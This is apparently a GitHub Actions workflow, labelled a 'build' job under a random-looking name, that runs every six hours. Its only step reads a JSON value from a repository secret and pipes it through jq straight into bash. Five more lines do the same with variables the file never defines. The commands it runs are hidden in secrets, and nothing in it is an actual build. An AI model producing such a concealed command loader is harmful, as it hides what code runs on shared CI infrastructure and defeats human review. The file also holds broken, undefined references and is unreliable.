name: lujingxi3456

on:
  workflow_dispatch:
  schedule:
    - cron: '7 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lujingxi3456
        env:
          ehasq0978: ${{ secrets.ehasq0978 }}
        run: |
          echo $ehasq0978 | jq -r .bz180 | /bin/bash
          echo $hylid7811 | jq -r .z71 | /bin/bash
          echo $gbw60977 | jq -r .qg86253 | /bin/bash
          echo $o9393 | jq -r .owpf488 | /bin/bash
          echo $lfz8656 | jq -r .v00 | /bin/bash
          echo $tan11 | jq -r .l8 | /bin/bash

